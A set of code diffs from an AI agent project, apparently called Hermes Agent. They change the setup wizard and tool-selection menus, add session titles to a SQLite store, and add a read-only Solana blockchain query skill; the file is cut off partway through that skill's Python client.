@@ -1784,7 +1869,7 @@ def run_setup_wizard(args):
setup_gateway(config)
# Section 5: Tools
setup_tools(config)
setup_tools(config, first_install=not is_existing)
# Save and show summary
save_config(config)

View File

@@ -408,10 +408,11 @@ def do_inspect(identifier: str, console: Optional[Console] = None) -> None:
def do_list(source_filter: str = "all", console: Optional[Console] = None) -> None:
"""List installed skills, distinguishing builtins from hub-installed."""
from tools.skills_hub import HubLockFile, SKILLS_DIR
from tools.skills_hub import HubLockFile, ensure_hub_dirs
from tools.skills_tool import _find_all_skills
c = console or _console
ensure_hub_dirs()
lock = HubLockFile()
hub_installed = {e["name"]: e for e in lock.list_installed()}

View File

@@ -206,6 +206,8 @@ def show_status(args):
"Telegram": ("TELEGRAM_BOT_TOKEN", "TELEGRAM_HOME_CHANNEL"),
"Discord": ("DISCORD_BOT_TOKEN", "DISCORD_HOME_CHANNEL"),
"WhatsApp": ("WHATSAPP_ENABLED", None),
"Signal": ("SIGNAL_HTTP_URL", "SIGNAL_HOME_CHANNEL"),
"Slack": ("SLACK_BOT_TOKEN", None),
}
for name, (token_var, home_var) in platforms.items():

View File

@@ -96,6 +96,11 @@ CONFIGURABLE_TOOLSETS = [
("homeassistant", "🏠 Home Assistant", "smart home device control"),
]
# Toolsets that are OFF by default for new installs.
# They're still in _HERMES_CORE_TOOLS (available at runtime if enabled),
# but the setup checklist won't pre-select them for first-time users.
_DEFAULT_OFF_TOOLSETS = {"moa", "homeassistant", "rl"}
# Platform display config
PLATFORMS = {
"cli": {"label": "🖥️ CLI", "default_toolset": "hermes-cli"},
@@ -142,6 +147,8 @@ TOOL_CATEGORIES = {
},
"web": {
"name": "Web Search & Extract",
"setup_title": "Select Search Provider",
"setup_note": "A free DuckDuckGo search skill is also included — skip this if you don't need Firecrawl.",
"icon": "🔍",
"providers": [
{
@@ -308,7 +315,7 @@ def _get_platform_tools(config: dict, platform: str) -> Set[str]:
platform_toolsets = config.get("platform_toolsets", {})
toolset_names = platform_toolsets.get(platform)
if not toolset_names or not isinstance(toolset_names, list):
if toolset_names is None or not isinstance(toolset_names, list):
default_ts = PLATFORMS[platform]["default_toolset"]
toolset_names = [default_ts]
@@ -358,46 +365,88 @@ def _toolset_has_keys(ts_key: str) -> bool:
# ─── Menu Helpers ─────────────────────────────────────────────────────────────
def _prompt_choice(question: str, choices: list, default: int = 0) -> int:
"""Single-select menu (arrow keys)."""
print(color(question, Colors.YELLOW))
"""Single-select menu (arrow keys). Uses curses to avoid simple_term_menu
rendering bugs in tmux, iTerm, and other non-standard terminals."""
# Curses-based single-select — works in tmux, iTerm, and standard terminals
try:
from simple_term_menu import TerminalMenu
menu = TerminalMenu(
[f" {c}" for c in choices],
cursor_index=default,
menu_cursor="",
menu_cursor_style=("fg_green", "bold"),
menu_highlight_style=("fg_green",),
cycle_cursor=True,
clear_screen=False,
)
idx = menu.show()
if idx is None:
return default
print()
return idx
except (ImportError, NotImplementedError):
for i, c in enumerate(choices):
marker = "" if i == default else ""
style = Colors.GREEN if i == default else ""
print(color(f" {marker} {c}", style) if style else f" {marker} {c}")
while True:
try:
val = input(color(f" Select [1-{len(choices)}] ({default + 1}): ", Colors.DIM))
if not val:
return default
idx = int(val) - 1
if 0 <= idx < len(choices):
return idx
except (ValueError, KeyboardInterrupt, EOFError):
print()
import curses
result_holder = [default]
def _curses_menu(stdscr):
curses.curs_set(0)
if curses.has_colors():
curses.start_color()
curses.use_default_colors()
curses.init_pair(1, curses.COLOR_GREEN, -1)
curses.init_pair(2, curses.COLOR_YELLOW, -1)
cursor = default
while True:
stdscr.clear()
max_y, max_x = stdscr.getmaxyx()
try:
stdscr.addnstr(0, 0, question, max_x - 1,
curses.A_BOLD | (curses.color_pair(2) if curses.has_colors() else 0))
except curses.error:
pass
for i, c in enumerate(choices):
y = i + 2
if y >= max_y - 1:
break
arrow = "" if i == cursor else " "
line = f" {arrow} {c}"
attr = curses.A_NORMAL
if i == cursor:
attr = curses.A_BOLD
if curses.has_colors():
attr |= curses.color_pair(1)
try:
stdscr.addnstr(y, 0, line, max_x - 1, attr)
except curses.error:
pass
stdscr.refresh()
key = stdscr.getch()
if key in (curses.KEY_UP, ord('k')):
cursor = (cursor - 1) % len(choices)
elif key in (curses.KEY_DOWN, ord('j')):
cursor = (cursor + 1) % len(choices)
elif key in (curses.KEY_ENTER, 10, 13):
result_holder[0] = cursor
return
elif key in (27, ord('q')):
return
curses.wrapper(_curses_menu)
return result_holder[0]
except Exception:
pass
# Fallback: numbered input (Windows without curses, etc.)
print(color(question, Colors.YELLOW))
for i, c in enumerate(choices):
marker = "" if i == default else ""
style = Colors.GREEN if i == default else ""
print(color(f" {marker} {i+1}. {c}", style) if style else f" {marker} {i+1}. {c}")
while True:
try:
val = input(color(f" Select [1-{len(choices)}] ({default + 1}): ", Colors.DIM))
if not val:
return default
idx = int(val) - 1
if 0 <= idx < len(choices):
return idx
except (ValueError, KeyboardInterrupt, EOFError):
print()
return default
def _prompt_toolset_checklist(platform_label: str, enabled: Set[str]) -> Set[str]:
"""Multi-select checklist of toolsets. Returns set of selected toolset keys."""
import platform as _platform
labels = []
for ts_key, ts_label, ts_desc in CONFIGURABLE_TOOLSETS:
@@ -411,48 +460,8 @@ def _prompt_toolset_checklist(platform_label: str, enabled: Set[str]) -> Set[str
if ts_key in enabled
]
# simple_term_menu multi-select has rendering bugs on macOS terminals,
# so we use a curses-based fallback there.
use_term_menu = _platform.system() != "Darwin"
if use_term_menu:
try:
from simple_term_menu import TerminalMenu
print(color(f"Tools for {platform_label}", Colors.YELLOW))
print(color(" SPACE to toggle, ENTER to confirm.", Colors.DIM))
print()
menu_items = [f" {label}" for label in labels]
menu = TerminalMenu(
menu_items,
multi_select=True,
show_multi_select_hint=False,
multi_select_cursor="[✓] ",
multi_select_select_on_accept=False,
multi_select_empty_ok=True,
preselected_entries=pre_selected_indices if pre_selected_indices else None,
menu_cursor="",
menu_cursor_style=("fg_green", "bold"),
menu_highlight_style=("fg_green",),
cycle_cursor=True,
clear_screen=False,
clear_menu_on_exit=False,
)
menu.show()
if menu.chosen_menu_entries is None:
return enabled
selected_indices = list(menu.chosen_menu_indices or [])
return {CONFIGURABLE_TOOLSETS[i][0] for i in selected_indices}
except (ImportError, NotImplementedError):
pass # fall through to curses/numbered fallback
# Curses-based multi-select — arrow keys + space to toggle + enter to confirm.
# Used on macOS (where simple_term_menu ghosts) and as a fallback.
# simple_term_menu has rendering bugs in tmux, iTerm, and other terminals.
try:
import curses
selected = set(pre_selected_indices)
@@ -593,11 +602,18 @@ def _configure_tool_category(ts_key: str, cat: dict, config: dict):
print(color(f" --- {icon} {name} ({provider['name']}) ---", Colors.CYAN))
if provider.get("tag"):
_print_info(f" {provider['tag']}")
# For single-provider tools, show a note if available
if cat.get("setup_note"):
_print_info(f" {cat['setup_note']}")
_configure_provider(provider, config)
else:
# Multiple providers - let user choose
print()
print(color(f" --- {icon} {name} - Choose a provider ---", Colors.CYAN))
# Use custom title if provided (e.g. "Select Search Provider")
title = cat.get("setup_title", f"Choose a provider")
print(color(f" --- {icon} {name} - {title} ---", Colors.CYAN))
if cat.get("setup_note"):
_print_info(f" {cat['setup_note']}")
print()
# Plain text labels only (no ANSI codes in menu items)
@@ -615,6 +631,9 @@ def _configure_tool_category(ts_key: str, cat: dict, config: dict):
configured = " [configured]"
provider_choices.append(f"{p['name']}{tag}{configured}")
# Add skip option
provider_choices.append("Skip — keep defaults / configure later")
# Detect current provider as default
default_idx = 0
for i, p in enumerate(providers):
@@ -626,7 +645,13 @@ def _configure_tool_category(ts_key: str, cat: dict, config: dict):
default_idx = i
break
provider_idx = _prompt_choice(" Select provider:", provider_choices, default_idx)
provider_idx = _prompt_choice(f" {title}:", provider_choices, default_idx)
# Skip selected
if provider_idx >= len(providers):
_print_info(f" Skipped {name}")
return
_configure_provider(providers[provider_idx], config)
@@ -833,9 +858,19 @@ def _reconfigure_simple_requirements(ts_key: str):
# ─── Main Entry Point ─────────────────────────────────────────────────────────
def tools_command(args=None):
"""Entry point for `hermes tools` and `hermes setup tools`."""
config = load_config()
def tools_command(args=None, first_install: bool = False, config: dict = None):
"""Entry point for `hermes tools` and `hermes setup tools`.
Args:
first_install: When True (set by the setup wizard on fresh installs),
skip the platform menu, go straight to the CLI checklist, and
prompt for API keys on all enabled tools that need them.
config: Optional config dict to use. When called from the setup
wizard, the wizard passes its own dict so that platform_toolsets
are written into it and survive the wizard's final save_config().
"""
if config is None:
config = load_config()
enabled_platforms = _get_enabled_platforms()
print()
@@ -844,6 +879,57 @@ def tools_command(args=None):
print(color(" Tools that need API keys will be configured when enabled.", Colors.DIM))
print()
# ── First-time install: linear flow, no platform menu ──
if first_install:
for pkey in enabled_platforms:
pinfo = PLATFORMS[pkey]
current_enabled = _get_platform_tools(config, pkey)
# Uncheck toolsets that should be off by default
checklist_preselected = current_enabled - _DEFAULT_OFF_TOOLSETS
# Show checklist
new_enabled = _prompt_toolset_checklist(pinfo["label"], checklist_preselected)
added = new_enabled - current_enabled
removed = current_enabled - new_enabled
if added:
for ts in sorted(added):
label = next((l for k, l, _ in CONFIGURABLE_TOOLSETS if k == ts), ts)
print(color(f" + {label}", Colors.GREEN))
if removed:
for ts in sorted(removed):
label = next((l for k, l, _ in CONFIGURABLE_TOOLSETS if k == ts), ts)
print(color(f" - {label}", Colors.RED))
# Walk through ALL selected tools that have provider options or
# need API keys. This ensures browser (Local vs Browserbase),
# TTS (Edge vs OpenAI vs ElevenLabs), etc. are shown even when
# a free provider exists.
to_configure = [
ts_key for ts_key in sorted(new_enabled)
if TOOL_CATEGORIES.get(ts_key) or TOOLSET_ENV_REQUIREMENTS.get(ts_key)
]
if to_configure:
print()
print(color(f" Configuring {len(to_configure)} tool(s):", Colors.YELLOW))
for ts_key in to_configure:
label = next((l for k, l, _ in CONFIGURABLE_TOOLSETS if k == ts_key), ts_key)
print(color(f"{label}", Colors.DIM))
print(color(" You can skip any tool you don't need right now.", Colors.DIM))
print()
for ts_key in to_configure:
_configure_toolset(ts_key, config)
_save_platform_tools(config, pkey, new_enabled)
save_config(config)
print(color(f" ✓ Saved {pinfo['label']} tool configuration", Colors.GREEN))
print()
return
# ── Returning user: platform menu loop ──
# Build platform choices
platform_choices = []
platform_keys = []
@@ -894,11 +980,10 @@ def tools_command(args=None):
print(color(f" - {label}", Colors.RED))
# Configure newly enabled toolsets that need API keys
if added:
for ts_key in sorted(added):
if TOOL_CATEGORIES.get(ts_key) or TOOLSET_ENV_REQUIREMENTS.get(ts_key):
if not _toolset_has_keys(ts_key):
_configure_toolset(ts_key, config)
for ts_key in sorted(added):
if (TOOL_CATEGORIES.get(ts_key) or TOOLSET_ENV_REQUIREMENTS.get(ts_key)):
if not _toolset_has_keys(ts_key):
_configure_toolset(ts_key, config)
_save_platform_tools(config, pkey, new_enabled)
save_config(config)

View File

@@ -24,7 +24,7 @@ from typing import Dict, Any, List, Optional
DEFAULT_DB_PATH = Path(os.getenv("HERMES_HOME", Path.home() / ".hermes")) / "state.db"
SCHEMA_VERSION = 2
SCHEMA_VERSION = 4
SCHEMA_SQL = """
CREATE TABLE IF NOT EXISTS schema_version (
@@ -46,6 +46,7 @@ CREATE TABLE IF NOT EXISTS sessions (
tool_call_count INTEGER DEFAULT 0,
input_tokens INTEGER DEFAULT 0,
output_tokens INTEGER DEFAULT 0,
title TEXT,
FOREIGN KEY (parent_session_id) REFERENCES sessions(id)
);
@@ -133,7 +134,33 @@ class SessionDB:
except sqlite3.OperationalError:
pass # Column already exists
cursor.execute("UPDATE schema_version SET version = 2")
if current_version < 3:
# v3: add title column to sessions
try:
cursor.execute("ALTER TABLE sessions ADD COLUMN title TEXT")
except sqlite3.OperationalError:
pass # Column already exists
cursor.execute("UPDATE schema_version SET version = 3")
if current_version < 4:
# v4: add unique index on title (NULLs allowed, only non-NULL must be unique)
try:
cursor.execute(
"CREATE UNIQUE INDEX IF NOT EXISTS idx_sessions_title_unique "
"ON sessions(title) WHERE title IS NOT NULL"
)
except sqlite3.OperationalError:
pass # Index already exists
cursor.execute("UPDATE schema_version SET version = 4")
# Unique title index — always ensure it exists (safe to run after migrations
# since the title column is guaranteed to exist at this point)
try:
cursor.execute(
"CREATE UNIQUE INDEX IF NOT EXISTS idx_sessions_title_unique "
"ON sessions(title) WHERE title IS NOT NULL"
)
except sqlite3.OperationalError:
pass # Index already exists
# FTS5 setup (separate because CREATE VIRTUAL TABLE can't be in executescript with IF NOT EXISTS reliably)
try:
@@ -219,6 +246,210 @@ class SessionDB:
row = cursor.fetchone()
return dict(row) if row else None
# Maximum length for session titles
MAX_TITLE_LENGTH = 100
@staticmethod
def sanitize_title(title: Optional[str]) -> Optional[str]:
"""Validate and sanitize a session title.
- Strips leading/trailing whitespace
- Removes ASCII control characters (0x00-0x1F, 0x7F) and problematic
Unicode control chars (zero-width, RTL/LTR overrides, etc.)
- Collapses internal whitespace runs to single spaces
- Normalizes empty/whitespace-only strings to None
- Enforces MAX_TITLE_LENGTH
Returns the cleaned title string or None.
Raises ValueError if the title exceeds MAX_TITLE_LENGTH after cleaning.
"""
if not title:
return None
import re
# Remove ASCII control characters (0x00-0x1F, 0x7F) but keep
# whitespace chars (\t=0x09, \n=0x0A, \r=0x0D) so they can be
# normalized to spaces by the whitespace collapsing step below
cleaned = re.sub(r'[\x00-\x08\x0b\x0c\x0e-\x1f\x7f]', '', title)
# Remove problematic Unicode control characters:
# - Zero-width chars (U+200B-U+200F, U+FEFF)
# - Directional overrides (U+202A-U+202E, U+2066-U+2069)
# - Object replacement (U+FFFC), interlinear annotation (U+FFF9-U+FFFB)
cleaned = re.sub(
r'[\u200b-\u200f\u2028-\u202e\u2060-\u2069\ufeff\ufffc\ufff9-\ufffb]',
'', cleaned,
)
# Collapse internal whitespace runs and strip
cleaned = re.sub(r'\s+', ' ', cleaned).strip()
if not cleaned:
return None
if len(cleaned) > SessionDB.MAX_TITLE_LENGTH:
raise ValueError(
f"Title too long ({len(cleaned)} chars, max {SessionDB.MAX_TITLE_LENGTH})"
)
return cleaned
def set_session_title(self, session_id: str, title: str) -> bool:
"""Set or update a session's title.
Returns True if session was found and title was set.
Raises ValueError if title is already in use by another session,
or if the title fails validation (too long, invalid characters).
Empty/whitespace-only strings are normalized to None (clearing the title).
"""
title = self.sanitize_title(title)
if title:
# Check uniqueness (allow the same session to keep its own title)
cursor = self._conn.execute(
"SELECT id FROM sessions WHERE title = ? AND id != ?",
(title, session_id),
)
conflict = cursor.fetchone()
if conflict:
raise ValueError(
f"Title '{title}' is already in use by session {conflict['id']}"
)
cursor = self._conn.execute(
"UPDATE sessions SET title = ? WHERE id = ?",
(title, session_id),
)
self._conn.commit()
return cursor.rowcount > 0
def get_session_title(self, session_id: str) -> Optional[str]:
"""Get the title for a session, or None."""
cursor = self._conn.execute(
"SELECT title FROM sessions WHERE id = ?", (session_id,)
)
row = cursor.fetchone()
return row["title"] if row else None
def get_session_by_title(self, title: str) -> Optional[Dict[str, Any]]:
"""Look up a session by exact title. Returns session dict or None."""
cursor = self._conn.execute(
"SELECT * FROM sessions WHERE title = ?", (title,)
)
row = cursor.fetchone()
return dict(row) if row else None
def resolve_session_by_title(self, title: str) -> Optional[str]:
"""Resolve a title to a session ID, preferring the latest in a lineage.
If the exact title exists, returns that session's ID.
If not, searches for "title #N" variants and returns the latest one.
If the exact title exists AND numbered variants exist, returns the
latest numbered variant (the most recent continuation).
"""
# First try exact match
exact = self.get_session_by_title(title)
# Also search for numbered variants: "title #2", "title #3", etc.
# Escape SQL LIKE wildcards (%, _) in the title to prevent false matches
escaped = title.replace("\\", "\\\\").replace("%", "\\%").replace("_", "\\_")
cursor = self._conn.execute(
"SELECT id, title, started_at FROM sessions "
"WHERE title LIKE ? ESCAPE '\\' ORDER BY started_at DESC",
(f"{escaped} #%",),
)
numbered = cursor.fetchall()
if numbered:
# Return the most recent numbered variant
return numbered[0]["id"]
elif exact:
return exact["id"]
return None
def get_next_title_in_lineage(self, base_title: str) -> str:
"""Generate the next title in a lineage (e.g., "my session""my session #2").
Strips any existing " #N" suffix to find the base name, then finds
the highest existing number and increments.
"""
import re
# Strip existing #N suffix to find the true base
match = re.match(r'^(.*?) #(\d+)$', base_title)
if match:
base = match.group(1)
else:
base = base_title
# Find all existing numbered variants
# Escape SQL LIKE wildcards (%, _) in the base to prevent false matches
escaped = base.replace("\\", "\\\\").replace("%", "\\%").replace("_", "\\_")
cursor = self._conn.execute(
"SELECT title FROM sessions WHERE title = ? OR title LIKE ? ESCAPE '\\'",
(base, f"{escaped} #%"),
)
existing = [row["title"] for row in cursor.fetchall()]
if not existing:
return base # No conflict, use the base name as-is
# Find the highest number
max_num = 1 # The unnumbered original counts as #1
for t in existing:
m = re.match(r'^.* #(\d+)$', t)
if m:
max_num = max(max_num, int(m.group(1)))
return f"{base} #{max_num + 1}"
def list_sessions_rich(
self,
source: str = None,
limit: int = 20,
offset: int = 0,
) -> List[Dict[str, Any]]:
"""List sessions with preview (first user message) and last active timestamp.
Returns dicts with keys: id, source, model, title, started_at, ended_at,
message_count, preview (first 60 chars of first user message),
last_active (timestamp of last message).
Uses a single query with correlated subqueries instead of N+2 queries.
"""
source_clause = "WHERE s.source = ?" if source else ""
query = f"""
SELECT s.*,
COALESCE(
(SELECT SUBSTR(REPLACE(REPLACE(m.content, X'0A', ' '), X'0D', ' '), 1, 63)
FROM messages m
WHERE m.session_id = s.id AND m.role = 'user' AND m.content IS NOT NULL
ORDER BY m.timestamp, m.id LIMIT 1),
''
) AS _preview_raw,
COALESCE(
(SELECT MAX(m2.timestamp) FROM messages m2 WHERE m2.session_id = s.id),
s.started_at
) AS last_active
FROM sessions s
{source_clause}
ORDER BY s.started_at DESC
LIMIT ? OFFSET ?
"""
params = (source, limit, offset) if source else (limit, offset)
cursor = self._conn.execute(query, params)
sessions = []
for row in cursor.fetchall():
s = dict(row)
# Build the preview from the raw substring
raw = s.pop("_preview_raw", "").strip()
if raw:
text = raw[:60]
s["preview"] = text + ("..." if len(raw) > 60 else "")
else:
s["preview"] = ""
sessions.append(s)
return sessions
# =========================================================================
# Message storage
# =========================================================================

View File

@@ -149,7 +149,7 @@ class MiniSWERunner:
def __init__(
self,
model: str = "anthropic/claude-sonnet-4-20250514",
model: str = "anthropic/claude-sonnet-4.6",
base_url: str = None,
api_key: str = None,
env_type: str = "local",
@@ -200,13 +200,7 @@ class MiniSWERunner:
else:
client_kwargs["base_url"] = "https://openrouter.ai/api/v1"
if base_url and "api.anthropic.com" in base_url.strip().lower():
raise ValueError(
"Anthropic's native /v1/messages API is not supported yet (planned for a future release). "
"Hermes currently requires OpenAI-compatible /chat/completions endpoints. "
"To use Claude models now, route through OpenRouter (OPENROUTER_API_KEY) "
"or any OpenAI-compatible proxy that wraps the Anthropic API."
)
# Handle API key - OpenRouter is the primary provider
if api_key:

View File

@@ -0,0 +1,207 @@
---
name: solana
description: Query Solana blockchain data with USD pricing — wallet balances, token portfolios with values, transaction details, NFTs, whale detection, and live network stats. Uses Solana RPC + CoinGecko. No API key required.
version: 0.2.0
author: Deniz Alagoz (gizdusum), enhanced by Hermes Agent
license: MIT
metadata:
hermes:
tags: [Solana, Blockchain, Crypto, Web3, RPC, DeFi, NFT]
related_skills: []
---
# Solana Blockchain Skill
Query Solana on-chain data enriched with USD pricing via CoinGecko.
8 commands: wallet portfolio, token info, transactions, activity, NFTs,
whale detection, network stats, and price lookup.
No API key needed. Uses only Python standard library (urllib, json, argparse).
---
## When to Use
- User asks for a Solana wallet balance, token holdings, or portfolio value
- User wants to inspect a specific transaction by signature
- User wants SPL token metadata, price, supply, or top holders
- User wants recent transaction history for an address
- User wants NFTs owned by a wallet
- User wants to find large SOL transfers (whale detection)
- User wants Solana network health, TPS, epoch, or SOL price
- User asks "what's the price of BONK/JUP/SOL?"
---
## Prerequisites
The helper script uses only Python standard library (urllib, json, argparse).
No external packages required.
Pricing data comes from CoinGecko's free API (no key needed, rate-limited
to ~10-30 requests/minute). For faster lookups, use `--no-prices` flag.
---
## Quick Reference
RPC endpoint (default): https://api.mainnet-beta.solana.com
Override: export SOLANA_RPC_URL=https://your-private-rpc.com
Helper script path: ~/.hermes/skills/blockchain/solana/scripts/solana_client.py
```
python3 solana_client.py wallet <address> [--limit N] [--all] [--no-prices]
python3 solana_client.py tx <signature>
python3 solana_client.py token <mint_address>
python3 solana_client.py activity <address> [--limit N]
python3 solana_client.py nft <address>
python3 solana_client.py whales [--min-sol N]
python3 solana_client.py stats
python3 solana_client.py price <mint_or_symbol>
```
---
## Procedure
### 0. Setup Check
```bash
python3 --version
# Optional: set a private RPC for better rate limits
export SOLANA_RPC_URL="https://api.mainnet-beta.solana.com"
# Confirm connectivity
python3 ~/.hermes/skills/blockchain/solana/scripts/solana_client.py stats
```
### 1. Wallet Portfolio
Get SOL balance, SPL token holdings with USD values, NFT count, and
portfolio total. Tokens sorted by value, dust filtered, known tokens
labeled by name (BONK, JUP, USDC, etc.).
```bash
python3 ~/.hermes/skills/blockchain/solana/scripts/solana_client.py \
wallet 9WzDXwBbmkg8ZTbNMqUxvQRAyrZzDsGYdLVL9zYtAWWM
```
Flags:
- `--limit N` — show top N tokens (default: 20)
- `--all` — show all tokens, no dust filter, no limit
- `--no-prices` — skip CoinGecko price lookups (faster, RPC-only)
Output includes: SOL balance + USD value, token list with prices sorted
by value, dust count, NFT summary, total portfolio value in USD.
### 2. Transaction Details
Inspect a full transaction by its base58 signature. Shows balance changes
in both SOL and USD.
```bash
python3 ~/.hermes/skills/blockchain/solana/scripts/solana_client.py \
tx 5j7s8K...your_signature_here
```
Output: slot, timestamp, fee, status, balance changes (SOL + USD),
program invocations.
### 3. Token Info
Get SPL token metadata, current price, market cap, supply, decimals,
mint/freeze authorities, and top 5 holders.
```bash
python3 ~/.hermes/skills/blockchain/solana/scripts/solana_client.py \
token DezXAZ8z7PnrnRJjz3wXBoRgixCa6xjnB7YaB1pPB263
```
Output: name, symbol, decimals, supply, price, market cap, top 5
holders with percentages.
### 4. Recent Activity
List recent transactions for an address (default: last 10, max: 25).
```bash
python3 ~/.hermes/skills/blockchain/solana/scripts/solana_client.py \
activity 9WzDXwBbmkg8ZTbNMqUxvQRAyrZzDsGYdLVL9zYtAWWM --limit 25
```
### 5. NFT Portfolio
List NFTs owned by a wallet (heuristic: SPL tokens with amount=1, decimals=0).
```bash
python3 ~/.hermes/skills/blockchain/solana/scripts/solana_client.py \
nft 9WzDXwBbmkg8ZTbNMqUxvQRAyrZzDsGYdLVL9zYtAWWM
```
Note: Compressed NFTs (cNFTs) are not detected by this heuristic.
### 6. Whale Detector
Scan the most recent block for large SOL transfers with USD values.
```bash
python3 ~/.hermes/skills/blockchain/solana/scripts/solana_client.py \
whales --min-sol 500
```
Note: scans the latest block only — point-in-time snapshot, not historical.
### 7. Network Stats
Live Solana network health: current slot, epoch, TPS, supply, validator
version, SOL price, and market cap.
```bash
python3 ~/.hermes/skills/blockchain/solana/scripts/solana_client.py stats
```
### 8. Price Lookup
Quick price check for any token by mint address or known symbol.
```bash
python3 ~/.hermes/skills/blockchain/solana/scripts/solana_client.py price BONK
python3 ~/.hermes/skills/blockchain/solana/scripts/solana_client.py price JUP
python3 ~/.hermes/skills/blockchain/solana/scripts/solana_client.py price SOL
python3 ~/.hermes/skills/blockchain/solana/scripts/solana_client.py price DezXAZ8z7PnrnRJjz3wXBoRgixCa6xjnB7YaB1pPB263
```
Known symbols: SOL, USDC, USDT, BONK, JUP, WETH, JTO, mSOL, stSOL,
PYTH, HNT, RNDR, WEN, W, TNSR, DRIFT, bSOL, JLP, WIF, MEW, BOME, PENGU.
---
## Pitfalls
- **CoinGecko rate-limits** — free tier allows ~10-30 requests/minute.
Price lookups use 1 request per token. Wallets with many tokens may
not get prices for all of them. Use `--no-prices` for speed.
- **Public RPC rate-limits** — Solana mainnet public RPC limits requests.
For production use, set SOLANA_RPC_URL to a private endpoint
(Helius, QuickNode, Triton).
- **NFT detection is heuristic** — amount=1 + decimals=0. Compressed
NFTs (cNFTs) and Token-2022 NFTs won't appear.
- **Whale detector scans latest block only** — not historical. Results
vary by the moment you query.
- **Transaction history** — public RPC keeps ~2 days. Older transactions
may not be available.
- **Token names** — ~25 well-known tokens are labeled by name. Others
show abbreviated mint addresses. Use the `token` command for full info.
- **Retry on 429** — both RPC and CoinGecko calls retry up to 2 times
with exponential backoff on rate-limit errors.
---
## Verification
```bash
# Should print current Solana slot, TPS, and SOL price
python3 ~/.hermes/skills/blockchain/solana/scripts/solana_client.py stats
```

View File

@@ -0,0 +1,698 @@
#!/usr/bin/env python3
"""
Solana Blockchain CLI Tool for Hermes Agent
--------------------------------------------
Queries the Solana JSON-RPC API and CoinGecko for enriched on-chain data.
Uses only Python standard library — no external packages required.
Usage:
python3 solana_client.py stats
python3 solana_client.py wallet <address> [--limit N] [--all] [--no-prices]
python3 solana_client.py tx <signature>
python3 solana_client.py token <mint_address>
python3 solana_client.py activity <address> [--limit N]
python3 solana_client.py nft <address>
python3 solana_client.py whales [--min-sol N]
python3 solana_client.py price <mint_address_or_symbol>
Environment:
SOLANA_RPC_URL Override the default RPC endpoint (default: mainnet-beta public)
"""
import argparse
import json
import os
import sys
import time
import urllib.request
import urllib.error
from typing import Any, Dict, List, Optional
RPC_URL = os.environ.get(
"SOLANA_RPC_URL",
"https://api.mainnet-beta.solana.com",
)
LAMPORTS_PER_SOL = 1_000_000_000
# Well-known Solana token names — avoids API calls for common tokens.
# Maps mint address → (symbol, name).
KNOWN_TOKENS: Dict[str, tuple] = {
"So11111111111111111111111111111111111111112": ("SOL", "Solana"),
"EPjFWdd5AufqSSqeM2qN1xzybapC8G4wEGGkZwyTDt1v": ("USDC", "USD Coin"),
"Es9vMFrzaCERmJfrF4H2FYD4KCoNkY11McCe8BenwNYB": ("USDT", "Tether"),
"DezXAZ8z7PnrnRJjz3wXBoRgixCa6xjnB7YaB1pPB263": ("BONK", "Bonk"),
"JUPyiwrYJFskUPiHa7hkeR8VUtAeFoSYbKedZNsDvCN": ("JUP", "Jupiter"),
"7vfCXTUXx5WJV5JADk17DUJ4ksgau7utNKj4b963voxs": ("WETH", "Wrapped Ether"),
"jtojtomepa8beP8AuQc6eXt5FriJwfFMwQx2v2f9mCL": ("JTO", "Jito"),
"mSoLzYCxHdYgdzU16g5QSh3i5K3z3KZK7ytfqcJm7So": ("mSOL", "Marinade Staked SOL"),
"7dHbWXmci3dT8UFYWYZweBLXgycu7Y3iL6trKn1Y7ARj": ("stSOL", "Lido Staked SOL"),
"HZ1JovNiVvGrGNiiYvEozEVgZ58xaU3RKwX8eACQBCt3": ("PYTH", "Pyth Network"),
"RLBxxFkseAZ4RgJH3Sqn8jXxhmGoz9jWxDNJMh8pL7a": ("RLBB", "Rollbit"),
"hntyVP6YFm1Hg25TN9WGLqM12b8TQmcknKrdu1oxWux": ("HNT", "Helium"),
"rndrizKT3MK1iimdxRdWabcF7Zg7AR5T4nud4EkHBof": ("RNDR", "Render"),
"WENWENvqqNya429ubCdR81ZmD69brwQaaBYY6p91oHQQ": ("WEN", "Wen"),
"85VBFQZC9TZkfaptBWjvUw7YbZjy52A6mjtPGjstQAmQ": ("W", "Wormhole"),
"TNSRxcUxoT9xBG3de7PiJyTDYu7kskLqcpddxnEJAS6": ("TNSR", "Tensor"),
"DriFtupJYLTosbwoN8koMbEYSx54aFAVLddWsbksjwg7": ("DRIFT", "Drift"),
"bSo13r4TkiE4KumL71LsHTPpL2euBYLFx6h9HP3piy1": ("bSOL", "BlazeStake Staked SOL"),
"27G8MtK7VtTcCHkpASjSDdkWWYfoqT6ggEuKidVJidD4": ("JLP", "Jupiter LP"),
"EKpQGSJtjMFqKZ9KQanSqYXRcF8fBopzLHYxdM65zcjm": ("WIF", "dogwifhat"),
"MEW1gQWJ3nEXg2qgERiKu7FAFj79PHvQVREQUzScPP5": ("MEW", "cat in a dogs world"),
"ukHH6c7mMyiWCf1b9pnWe25TSpkDDt3H5pQZgZ74J82": ("BOME", "Book of Meme"),
"A8C3xuqscfmyLrte3VwJvtPHXvcSN3FjDbUaSMAkQrCS": ("PENGU", "Pudgy Penguins"),
}
# Reverse lookup: symbol → mint (for the `price` command).
_SYMBOL_TO_MINT = {v[0].upper(): k for k, v in KNOWN_TOKENS.items()}
# ---------------------------------------------------------------------------
# HTTP / RPC helpers
# ---------------------------------------------------------------------------
def _http_get_json(url: str, timeout: int = 10, retries: int = 2) -> Any:
"""GET JSON from a URL with retry on 429 rate-limit. Returns parsed JSON or None."""
for attempt in range(retries + 1):
req = urllib.request.Request(
url, headers={"Accept": "application/json", "User-Agent": "HermesAgent/1.0"},
)
try:
with urllib.request.urlopen(req, timeout=timeout) as resp:
return json.load(resp)
except urllib.error.HTTPError as exc:
if exc.code == 429 and attempt < retries:
time.sleep(2.0 * (attempt + 1))
continue
return None
except Exception:
return None
return None
def _rpc_call(method: str, params: list = None, retries: int = 2) -> Any:
"""Send a JSON-RPC request with retry on 429 rate-limit."""
payload = json.dumps({
"jsonrpc": "2.0", "id": 1,
"method": method, "params": params or [],
}).encode()
for attempt in range(retries + 1):
req = urllib.request.Request(
RPC_URL, data=payload,
headers={"Content-Type": "application/json"}, method="POST",
)
try:
with urllib.request.urlopen(req, timeout=20) as resp:
body = json.load(resp)
if "error" in body:
err = body["error"]
# Rate-limit: retry after delay
if isinstance(err, dict) and err.get("code") == 429:
if attempt < retries:
time.sleep(1.5 * (attempt + 1))
continue
sys.exit(f"RPC error: {err}")
return body.get("result")
except urllib.error.HTTPError as exc:
if exc.code == 429 and attempt < retries:
time.sleep(1.5 * (attempt + 1))
continue
sys.exit(f"RPC HTTP error: {exc}")
